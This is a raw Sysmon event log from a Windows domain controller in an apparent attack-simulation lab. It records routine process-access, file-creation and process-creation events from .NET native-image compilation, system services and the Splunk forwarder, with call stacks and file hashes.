13:22:20.778{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458C-6000-5602-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.762{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5602-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.762{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458C-6000-5602-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:20.715{08A6967A-458C-6000-5502-000000009A01}2696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a88-0\System.AddIn.Contract.dll2021-01-14 13:22:20.715 10341000x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.668{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458C-6000-5502-000000009A01}2696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.653{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5502-000000009A01}2696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.653{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458C-6000-5502-000000009A01}2696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.637{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458C-6000-5402-000000009A01}4164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.621{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5402-000000009A01}4164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.621{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458C-6000-5402-000000009A01}4164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:20.543{08A6967A-458C-6000-5202-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1108-0\System.AddIn.dll2021-01-14 13:22:20.543 10341000x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-458C-6000-5302-000000009A01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5302-000000009A01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.246{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-458C-6000-5302-000000009A01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.247{08A6967A-458C-6000-5302-000000009A01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.059{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458C-6000-5202-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.043{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5202-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.043{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458C-6000-5202-000000009A01}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 